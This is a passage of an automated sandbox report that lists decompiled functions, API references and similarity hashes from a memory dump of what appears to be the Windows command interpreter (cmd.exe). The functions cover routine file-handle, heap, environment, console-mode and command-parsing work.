				} else {
					__imp___open_osfhandle(_t15, 8);
					_t17 = _t6;
					if(_t17 == 0xffffffff) {
						CloseHandle(_t15);
					}
				}
				return _t17;
			}

0x00d843ab
0x00d843b3
0x00d843b6
0x00d843d5
0x00d843db
0x00d843e0
0x00d9838d
0x00d98393
0x00d9839b
0x00d9839d
0x00d9839d
0x00d983a7
0x00d843e6
0x00d843e9
0x00d843ef
0x00d843f6
0x00d84401
0x00d84401
0x00d843f6
0x00d843ff

APIs

Part of subcall function 00D922C0: wcschr.MSVCRT ref: 00D922CC

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 00D843D5
_open_osfhandle.MSVCRT ref: 00D843E9
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D84401
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D9838D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 0e1427ee89565b88c6f57e693e6365a0f43e17d0a9606eae43931cc4d46cb2b9
Instruction ID: aa0361bf794a766eb2a2325b70c6b8811aa2d572ea8b679180de12e24e641b82
Opcode Fuzzy Hash: 0e1427ee89565b88c6f57e693e6365a0f43e17d0a9606eae43931cc4d46cb2b9
Instruction Fuzzy Hash: ED018F71901322AAD7146BA8AC0DF9EBBA8EB45B35F254319F965E32D0DBB0480597B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA1914, Relevance: 6.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DA1914(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						RtlFreeHeap(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				RtlFreeHeap(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}

0x00da1918
0x00da191e
0x00da1924
0x00da1928
0x00da192b
0x00da192e
0x00da1939
0x00da193f
0x00da1942
0x00da1945
0x00da194c
0x00da1950
0x00da1953
0x00da195e
0x00da1966
0x00da1969
0x00da196e

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00DA1735), ref: 00DA1932
RtlFreeHeap.NTDLL(00000000,?,?), ref: 00DA1939
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00DA1735), ref: 00DA1957
RtlFreeHeap.NTDLL(00000000), ref: 00DA195E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: f23572127aea4609e06cb2133f1975bcdee0ef51c3510bddb1e0331e93cfc687
Instruction ID: 15062ba1627d4c656786e6c711a1a400ed27f21d1e79506669a364a65f85e765
Opcode Fuzzy Hash: f23572127aea4609e06cb2133f1975bcdee0ef51c3510bddb1e0331e93cfc687
Instruction Fuzzy Hash: B5F03C72610703ABD7149FA0E89DBA5B7B8FB48326F140929E541C6540D774E895CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D93B2C, Relevance: 6.0, APIs: 4, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00D93B2C(void* __ecx) {
				void _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				} else {
					_t4 = E00D93AAE();
					 *_t12 = _t4;
					if(_t4 == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t12);
						_push(0);
						_push(0x233a);
						E00D8C5A2(_t9);
						goto L4;
					} else {
						return _t12;
					}
				}
			}

0x00d93b2c
0x00d93b40
0x00d93b44
0x00d9e005
0x00d9e008
0x00d93b4a
0x00d93b4a
0x00d93b4f
0x00d93b53
0x00d9dff1
0x00d9dff7
0x00d9dff9
0x00d9dffe
0x00000000
0x00d93b59
0x00d93b5c
0x00d93b5c
0x00d93b53

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D93DBB), ref: 00D93B33
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D93DBB), ref: 00D93B3A

Part of subcall function 00D93AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D93A9F), ref: 00D93AB2
Part of subcall function 00D93AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D93ACD
Part of subcall function 00D93AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D93AD4
Part of subcall function 00D93AAE: memcpy.MSVCRT ref: 00D93AE3
Part of subcall function 00D93AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D93AEC

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00D93DBB), ref: 00D9DFEA
RtlFreeHeap.NTDLL(00000000,?,00D93DBB), ref: 00D9DFF1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
String ID:
API String ID: 197374240-0
Opcode ID: de23c42832640d87ed35565f61b8cb34e74674da14939b066c9471fb01eca554
Instruction ID: 30a9294bd86d8928b747d57595ff5f6a3bfc1c7341e163ab494ffb0bf9b221ee
Opcode Fuzzy Hash: de23c42832640d87ed35565f61b8cb34e74674da14939b066c9471fb01eca554
Instruction Fuzzy Hash: C1E0123264475367DB213BB57C1FF866A55DB45761F194095F785C92C0DD60C9408770

Uniqueness

Uniqueness Score: -1.00%

Function 00DA9897, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00DA9897() {
				signed int _v8;
				void* _t4;
				int _t5;
				void* _t7;
				void* _t9;

				_t4 =  &_v8;
				__imp___get_osfhandle(_t4, _t9);
				_t5 = GetConsoleMode(_t4, 1);
				if(_t5 != 0) {
					_t7 = _v8 & 0xfffffffb;
					_v8 = _t7;
					__imp___get_osfhandle(_t7);
					return SetConsoleMode(_t7, 1);
				}
				return _t5;
			}

0x00da989d
0x00da98a3
0x00da98ab
0x00da98b3
0x00da98b8
0x00da98be
0x00da98c1
0x00000000
0x00da98c9
0x00da98d2

APIs

_get_osfhandle.MSVCRT ref: 00DA98A3
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00DA3811,?,?,00000001,?), ref: 00DA98AB
_get_osfhandle.MSVCRT ref: 00DA98C1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DA3811,?,?,00000001,?), ref: 00DA98C9

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 190f941eec096a02cba964f150c7ae8e6be742fddf1c1e056c0d1cfc620ede03
Instruction ID: 7c670fa4883c9aa374d2208755f00a15fb57a8575afd9592e030d4c8bd8234df
Opcode Fuzzy Hash: 190f941eec096a02cba964f150c7ae8e6be742fddf1c1e056c0d1cfc620ede03
Instruction Fuzzy Hash: 96E01A7290030BEBEB109BB4EC1EEAAB76CEB41321F140A45F915C62D1DB759A00A670

Uniqueness

Uniqueness Score: -1.00%

Function 00D94C00, Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00D94C00() {
				void* _t1;
				void* _t2;
				intOrPtr _t4;

				_t4 =  *0xdb387c;
				_t1 =  *0xdb3878;
				 *0xdb3880 = _t4;
				 *0xdb3884 = _t1;
				__imp___get_osfhandle(_t4);
				_t2 = SetConsoleMode(_t1, 1);
				__imp___get_osfhandle( *0xdb3884);
				return SetConsoleMode(_t2, 0);
			}

0x00d94c00
0x00d94c06
0x00d94c0e
0x00d94c14
0x00d94c19
0x00d94c21
0x00d94c2f
0x00d94c3d

APIs

_get_osfhandle.MSVCRT ref: 00D94C19
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D94C21
_get_osfhandle.MSVCRT ref: 00D94C2F
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D94C37

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: 0e0636a9f9bc68bf30606e6f4518f8f11e73ad572f6f59ee4b4a64b2b5262990
Instruction ID: ec31df674058915ac3060c046ea6e09fd905ca08187d9044399c414715757d2f
Opcode Fuzzy Hash: 0e0636a9f9bc68bf30606e6f4518f8f11e73ad572f6f59ee4b4a64b2b5262990
Instruction Fuzzy Hash: BEE009BA940702EBEF089BA4FD1EA55BBA5E748301B144A09F515C63A1DBB5A500FB32

Uniqueness

Uniqueness Score: -1.00%

Function 00D89429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00D89429(void* __ebx, signed short* __ecx, void* __edi) {
				intOrPtr _v8;
				signed int _t19;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t26;
				void* _t28;
				signed int _t34;
				signed int _t35;
				char* _t37;
				signed int _t38;
				void* _t40;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				intOrPtr* _t51;
				signed int _t55;
				void* _t56;
				signed int _t61;
				signed short* _t70;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t78;
				void* _t79;
				signed int _t82;
				signed int _t84;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_push(__ecx);
				_t89 = __ecx;
				if(__ecx == 0) {
					L17:
					_t19 = 1;
					L12:
					return _t19;
				}
				_t20 = E00D900B0(0xffce);
				_v8 = _t20;
				if(_t20 == 0) {
					goto L17;
				}
				_push(__ebx);
				_t21 = 0x5e;
				_t22 = E00D8D7D4(__ecx, _t21);
				_t45 = 0;
				if(_t22 != 0) {
					_t51 = __ecx;
					_t70 =  &(__ecx[1]);
					do {
						_t23 =  *_t51;
						_t51 = _t51 + 2;
						__eflags = _t23;
					} while (_t23 != 0);
					_t84 = E00D900B0(2 + (_t51 - _t70 >> 1) * 4);
					__eflags = _t84;
					if(_t84 == 0) {
						L51:
						_t19 = 1;
						L11:
						goto L12;
					}
					_t26 =  *__ecx & 0x0000ffff;
					_t55 = _t84;
					__eflags = _t26;
					if(_t26 == 0) {
						L28:
						_t71 = _t84;
						__eflags = 0;
						 *_t55 = 0;
						_t11 = _t71 + 2; // 0x2
						_t56 = _t11;
						do {
							_t28 =  *_t71;
							_t71 = _t71 + 2;
							__eflags = _t28 - _t45;
						} while (_t28 != _t45);
						_t89 = E00D90100(_t84, 2 + (_t71 - _t56 >> 1) * 2);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L51;
						}
						goto L3;
					}
					_t82 = _t26;
					_t47 = 0x5e;
					do {
						 *_t55 = _t82;
						_t89 = _t89 + 2;
						_t55 = _t55 + 2;
						__eflags = _t82 - _t47;
						if(_t82 == _t47) {
							 *_t55 = _t47;
							_t55 = _t55 + 2;
							__eflags = _t55;
						}
						_t43 =  *_t89 & 0x0000ffff;
						_t82 = _t43;
						__eflags = _t43;
					} while (_t43 != 0);
					_t45 = 0;
					__eflags = 0;
					goto L28;
				}
				L3:
				 *0xdad538 = 1;
				_t86 = E00D8EEF0(1, _t89,  *0xdc3cd8);
				 *0xdad538 = _t45;
				if(_t86 == 1) {
					_t87 = E00D8DF40(_t89);
					__eflags = _t87;
					if(_t87 == 0) {
						goto L51;
					}
					__imp___wcsupr(_t87);
					_t61 = L" IF";
					_t34 = _t87;
					while(1) {
						_t76 =  *_t34;
						__eflags = _t76 -  *_t61;
						if(_t76 !=  *_t61) {
							break;
						}
						__eflags = _t76;
						if(_t76 == 0) {
							L38:
							_t35 = _t45;
							L40:
							__eflags = _t35;
							if(_t35 == 0) {
								L49:
								E00D8C5A2(_t61, 0x234a, 1, _t89);
								goto L51;
							}
							_t37 = L" FOR";
							while(1) {
								_t61 =  *_t87;
								__eflags = _t61 -  *_t37;
								if(_t61 !=  *_t37) {
									break;
								}
								__eflags = _t61;
								if(_t61 == 0) {
									L48:
									__eflags = _t45;
									if(_t45 != 0) {
										goto L51;
									}
									goto L49;
								}
								_t61 =  *((intOrPtr*)(_t87 + 2));
								__eflags = _t61 - _t37[2];
								if(_t61 != _t37[2]) {
									break;
								}
								_t87 = _t87 + 4;
								_t37 =  &(_t37[4]);
								__eflags = _t61;
								if(_t61 != 0) {
									continue;
								}
								goto L48;
							}
							asm("sbb ebx, ebx");
							_t45 = _t45 | 0x00000001;
							__eflags = _t45;
							goto L48;
						}
						_t77 =  *((intOrPtr*)(_t34 + 2));
						__eflags = _t77 -  *((intOrPtr*)(_t61 + 2));
						if(_t77 !=  *((intOrPtr*)(_t61 + 2))) {
							break;
						}
						_t34 = _t34 + 4;
						_t61 = _t61 + 4;
						__eflags = _t77;
						if(_t77 != 0) {
							continue;
						}
						goto L38;
					}
					asm("sbb eax, eax");
					_t35 = _t34 | 0x00000001;
					__eflags = _t35;
					goto L40;
				}
				if(_t86 == 0xffffffff) {
					_t19 = 0;
					goto L11;
				}
				if( *0xdc3cc9 == 0 ||  *((short*)( *((intOrPtr*)(_t86 + 0x38)))) != 0x3a) {
					_t78 = 0x2a;
					_t38 = E00D8D7D4( *((intOrPtr*)(_t86 + 0x38)), _t78);
					__eflags = _t38;
					if(_t38 != 0) {
						L16:
						_t19 = E00D907C0(_t45, _t86);
						goto L11;
					}
					_t79 = 0x3f;
					__eflags = E00D8D7D4( *((intOrPtr*)(_t86 + 0x38)), _t79);
					if(__eflags != 0) {
						goto L16;
					}
					_t91 = _v8;
					_t40 = E00D910B0(_t86, _v8, __eflags, 0x7fe7);
					__eflags = _t40 - 2;
					if(_t40 == 2) {
						goto L9;
					}
					goto L16;
				} else {
					if( *0xdc3cc4 == 0) {
						_push(_t45);
						_push(0x400023aa);
						E00D8C5A2(1);
						goto L51;
					}
					_t91 = _v8;
					L9:
					_t19 = E00D92ABE(_t86, _t91, 0x7fe7, 1);
					if(_t19 == 0) {
						_t19 =  *0xdbb8b0;
					}
					goto L11;
				}
			}

0x00d8942e
0x00d89430
0x00d89434
0x00d89517
0x00d89519
0x00d894d5
0x00d894d9
0x00d894d9
0x00d8943f
0x00d89444
0x00d89449
0x00000000
0x00000000
0x00d8944f
0x00d89453
0x00d89458
0x00d8945d
0x00d89461
0x00da0975
0x00da0977
0x00da097a
0x00da097a
0x00da097d
0x00da0980
0x00da0980
0x00da0995
0x00da0997
0x00da0999
0x00da0aa4
0x00da0aa6
0x00d894d3
0x00000000
0x00d894d4
0x00da099f
0x00da09a2
0x00da09a4
0x00da09a7
0x00da09ce
0x00da09ce
0x00da09d0
0x00da09d2
0x00da09d5
0x00da09d5
0x00da09d8
0x00da09d8
0x00da09db
0x00da09de
0x00da09de
0x00da09f5
0x00da09f7
0x00da09f9
0x00000000
0x00000000
0x00000000
0x00da09ff
0x00da09ab
0x00da09ad
0x00da09ae
0x00da09ae
0x00da09b1
0x00da09b4
0x00da09b7
0x00da09ba
0x00da09bc
0x00da09bf
0x00da09bf
0x00da09bf
0x00da09c2
0x00da09c5
0x00da09c7
0x00da09c7
0x00da09cc
0x00da09cc
0x00000000
0x00da09cc
0x00d89467
0x00d89474
0x00d8947e
0x00d89480
0x00d89489
0x00da0a0b
0x00da0a0d
0x00da0a0f
0x00000000
0x00000000
0x00da0a16
0x00da0a1d
0x00da0a22
0x00da0a24
0x00da0a24
0x00da0a27
0x00da0a2a
0x00000000
0x00000000
0x00da0a2c
0x00da0a2f
0x00da0a46
0x00da0a46
0x00da0a4f
0x00da0a4f
0x00da0a51
0x00da0a85
0x00da0a8d
0x00000000
0x00da0a92
0x00da0a53
0x00da0a58
0x00da0a58
0x00da0a5b
0x00da0a5e
0x00000000
0x00000000
0x00da0a60
0x00da0a63
0x00da0a81
0x00da0a81
0x00da0a83
0x00000000
0x00000000
0x00000000
0x00da0a83
0x00da0a65
0x00da0a69
0x00da0a6d
0x00000000
0x00000000
0x00da0a6f
0x00da0a72
0x00da0a75
0x00da0a78
0x00000000
0x00000000
0x00000000
0x00da0a7a
0x00da0a7c
0x00da0a7e
0x00da0a7e
0x00000000
0x00da0a7e
0x00da0a31
0x00da0a35
0x00da0a39
0x00000000
0x00000000
0x00da0a3b
0x00da0a3e
0x00da0a41
0x00da0a44
0x00000000
0x00000000
0x00000000
0x00da0a44
0x00da0a4a
0x00da0a4c
0x00da0a4c
0x00000000
0x00da0a4c
0x00d89492
0x00d8951c
0x00000000
0x00d8951c
0x00d8949f
0x00d894df
0x00d894e0
0x00d894e5
0x00d894e7
0x00d8950e
0x00d89510
0x00000000
0x00d89510
0x00d894ee
0x00d894f4
0x00d894f6
0x00000000
0x00000000
0x00d894f8
0x00d89504
0x00d89509
0x00d8950c
0x00000000
0x00000000
0x00000000
0x00d894aa
0x00d894b1
0x00da0a97
0x00da0a98
0x00da0a9d
0x00000000
0x00da0aa3
0x00d894b7
0x00d894ba
0x00d894c5
0x00d894cc
0x00d894ce
0x00d894ce
0x00000000
0x00d894cc

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

Part of subcall function 00D8D7D4: wcschr.MSVCRT ref: 00D8D7DA

Part of subcall function 00D8EEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,00D8E5F6,?,00000000,00000000,00000000), ref: 00D8EF39
Part of subcall function 00D8EEF0: RtlFreeHeap.NTDLL(00000000,?,00D8E5F6), ref: 00D8EF40
Part of subcall function 00D8EEF0: _setjmp3.MSVCRT ref: 00D8EFA5

_wcsupr.MSVCRT ref: 00DA0A16

Part of subcall function 00D92ABE: memset.MSVCRT ref: 00D92B59
Part of subcall function 00D92ABE: ??_V@YAXPAX@Z.MSVCRT ref: 00D92C13

Strings

FOR, xrefs: 00DA0A53
IF, xrefs: 00DA0A1D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
String ID: FOR$ IF
API String ID: 3818062306-2924197646
Opcode ID: 61a8bec0677c4c489d21ce621f02aa8e83d9e65873e1d83c07ed3e540ca62f0b
Instruction ID: 99a75c0c24758924d10350afd37d746455654750b24d8a849bb88dfe2889331a
Opcode Fuzzy Hash: 61a8bec0677c4c489d21ce621f02aa8e83d9e65873e1d83c07ed3e540ca62f0b
Instruction Fuzzy Hash: 4B5116357003029AEB257B28D86177B7692EF96718B2C4069E986CB3D5FB71DD42C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DAB2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00DAB2BF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t68;
				signed int _t70;
				int _t73;
				signed int _t78;
				signed int _t79;
				intOrPtr _t82;
				signed int _t88;
				void* _t93;
				intOrPtr _t96;
				signed int _t99;
				signed int _t100;
				intOrPtr* _t101;
				short _t105;
				long _t108;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t128;

				_push(0x30);
				_push(0xdac160);
				E00D97678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t128 - 0x3c)) = __edx;
				 *((intOrPtr*)(_t128 - 0x24)) = __ecx;
				_t68 = E00D900B0(0x4000);
				_t93 = _t68;
				 *(_t128 - 0x40) = _t93;
				if(_t93 == 0) {
					L46:
					return E00D976BD(_t68);
				}
				_t121 = 0;
				 *((intOrPtr*)(_t128 - 4)) = 0;
				if( *((intOrPtr*)(_t128 + 0x14)) != 0) {
					L4:
					_t115 = _t121;
					 *(_t128 - 0x2c) = _t115;
					_t119 = _t121;
					 *(_t128 - 0x28) = _t119;
					_t70 = _t68 | 0xffffffff;
					__eflags = _t70;
					 *(_t128 - 0x1c) = _t70;
					 *(_t128 - 0x30) = _t70;
					 *(_t128 - 0x20) = _t121;
					 *(_t128 - 0x34) = 0x2a;
					while(1) {
						 *(_t128 - 0x38) = _t121;
						_t96 =  *((intOrPtr*)(_t128 + 8));
						__eflags = _t121 - _t96;
						if(_t121 >= _t96) {
							break;
						}
						_t108 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
						__eflags = _t108 - 0x2f;
						if(_t108 != 0x2f) {
							__eflags = _t108 - 0x22;
							if(_t108 != 0x22) {
								__eflags = _t115;
								if(_t115 != 0) {
									L17:
									_t110 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
									__eflags = _t110 - 0x3a;
									if(_t110 == 0x3a) {
										L22:
										_t35 = _t121 + 1; // 0x1
										_t70 = _t35;
										 *(_t128 - 0x1c) = _t70;
										 *(_t128 - 0x30) = _t70;
										L23:
										__eflags = 0;
										 *(_t128 - 0x20) = 0;
										L24:
										_t121 = _t121 + 1;
										continue;
									}
									__eflags = _t110 - 0x5c;
									if(_t110 == 0x5c) {
										goto L22;
									}
									__eflags = _t110 -  *(_t128 - 0x34);
									if(_t110 ==  *(_t128 - 0x34)) {
										L21:
										 *(_t128 - 0x20) = 1;
										goto L24;
									}
									__eflags = _t110 - 0x3f;
									if(_t110 != 0x3f) {
										goto L24;
									}
									goto L21;
								}
								_t88 = wcschr(L" &()[]{}^=;!%\'+,`~", _t108);
								_t115 =  *(_t128 - 0x2c);
								__eflags = _t88;
								if(_t88 == 0) {
									_t70 =  *(_t128 - 0x1c);
									goto L17;
								}
								_t25 = _t121 + 1; // 0x1
								_t119 = _t25;
								 *(_t128 - 0x28) = _t119;
								__eflags = 0;
								 *(_t128 - 0x20) = 0;
								L15:
								_t70 =  *(_t128 - 0x1c);
								goto L24;
							}
							__eflags = _t115;
							if(_t115 == 0) {
								_t119 = _t121;
								 *(_t128 - 0x28) = _t119;
							}
							__eflags = _t115;
							_t115 = 0 | _t115 == 0x00000000;
							 *(_t128 - 0x2c) = _t115;
							goto L15;
						}
						_t18 = _t121 + 1; // 0x1
						_t119 = _t18;
						 *(_t128 - 0x28) = _t119;
						goto L23;
					}
					__eflags = _t70 - 0xffffffff;
					if(_t70 == 0xffffffff) {
						L27:
						_t122 = _t119;
						 *(_t128 - 0x30) = _t119;
						L29:
						_t73 = _t96 - _t119 + _t96 - _t119;
						 *(_t128 - 0x34) = _t73;
						memcpy(_t93,  *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t73);
						_t78 =  *((intOrPtr*)(_t128 + 8)) - _t119;
						__eflags =  *(_t128 - 0x20);
						if(__eflags != 0) {
							__eflags = 0;
							 *((short*)(_t93 + _t78 * 2)) = 0;
						} else {
							_t105 = 0x2a;
							 *((short*)(_t93 + _t78 * 2)) = _t105;
							 *((short*)( *(_t128 - 0x34) + _t93 + 2)) = 0;
						}
						_t124 =  *(_t128 + 0x10);
						_t79 = E00DAAEE5(_t93, __eflags, _t124, _t122 - _t119);
						 *0xdad580 = _t79;
						_t99 = _t79;
						 *0xdad57c = _t99;
						 *0xdad574 = _t119;
						 *0xdad578 = _t124;
						_t121 = 0;
						__eflags = 0;
						L33:
						if(_t79 == 0) {
							L45:
							 *((intOrPtr*)(_t128 - 4)) = 0xfffffffe;
							E00DAB4D5(_t93);
							_t68 =  *0xdad580; // 0x0
							goto L46;
						}
						if( *((intOrPtr*)(_t128 + 0xc)) == 0) {
							_t100 = _t99 - 1;
							__eflags = _t100;
							 *0xdad57c = _t100;
							if(_t100 >= 0) {
								L40:
								_t116 =  *((intOrPtr*)( *0xdc853c + _t100 * 4));
								_t101 =  *((intOrPtr*)( *0xdc853c + _t100 * 4));
								_t125 = _t101 + 2;
								do {
									_t82 =  *_t101;
									_t101 = _t101 + 2;
								} while (_t82 !=  *((intOrPtr*)(_t128 - 4)));
								_t126 =  *((intOrPtr*)(_t128 - 0x3c));
								if((_t101 - _t125 >> 1) + _t119 < _t126) {
									__eflags = _t126 - _t119;
									E00D91040( *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t126 - _t119, _t116);
								} else {
									 *0xdad580 = 0;
								}
								goto L45;
							}
							_t56 = _t79 - 1; // -1
							_t100 = _t56;
							L39:
							 *0xdad57c = _t100;
							goto L40;
						}
						_t100 = _t99 + 1;
						 *0xdad57c = _t100;
						if(_t100 < _t79) {
							goto L40;
						}
						_t100 = _t121;
						goto L39;
					}
					__eflags = _t70 - _t119;
					if(_t70 >= _t119) {
						_t122 =  *(_t128 - 0x1c);
						goto L29;
					}
					goto L27;
				}
				_t68 =  *0xdad578; // 0x0
				if(_t68 !=  *(_t128 + 0x10)) {
					goto L4;
				}
				_t79 =  *0xdad580; // 0x0
				_t99 =  *0xdad57c; // 0x0
				_t119 =  *0xdad574; // 0x0
				goto L33;
			}

0x00dab2bf
0x00dab2c1
0x00dab2c6
0x00dab2cb
0x00dab2ce
0x00dab2d6
0x00dab2db
0x00dab2dd
0x00dab2e2
0x00dab4ca
0x00dab4cf
0x00dab4cf
0x00dab2e8
0x00dab2ea
0x00dab2f0
0x00dab312
0x00dab312
0x00dab314
0x00dab317
0x00dab319
0x00dab31c
0x00dab31c
0x00dab31f
0x00dab322
0x00dab325
0x00dab328
0x00dab32f
0x00dab32f
0x00dab332
0x00dab335
0x00dab337
0x00000000
0x00000000
0x00dab340
0x00dab344
0x00dab347
0x00dab351
0x00dab354
0x00dab36d
0x00dab36f
0x00dab399
0x00dab39c
0x00dab3a0
0x00dab3a3
0x00dab3be
0x00dab3be
0x00dab3be
0x00dab3c1
0x00dab3c4
0x00dab3c7
0x00dab3c7
0x00dab3c9
0x00dab3cc
0x00dab3cc
0x00000000
0x00dab3cc
0x00dab3a5
0x00dab3a8
0x00000000
0x00000000
0x00dab3aa
0x00dab3ae
0x00dab3b5
0x00dab3b5
0x00000000
0x00dab3b5
0x00dab3b0
0x00dab3b3
0x00000000
0x00000000
0x00000000
0x00dab3b3
0x00dab377
0x00dab37f
0x00dab382
0x00dab384
0x00dab396
0x00000000
0x00dab396
0x00dab386
0x00dab386
0x00dab389
0x00dab38c
0x00dab38e
0x00dab391
0x00dab391
0x00000000
0x00dab391
0x00dab356
0x00dab358
0x00dab35a
0x00dab35c
0x00dab35c
0x00dab361
0x00dab366
0x00dab368
0x00000000
0x00dab368
0x00dab349
0x00dab349
0x00dab34c
0x00000000
0x00dab34c
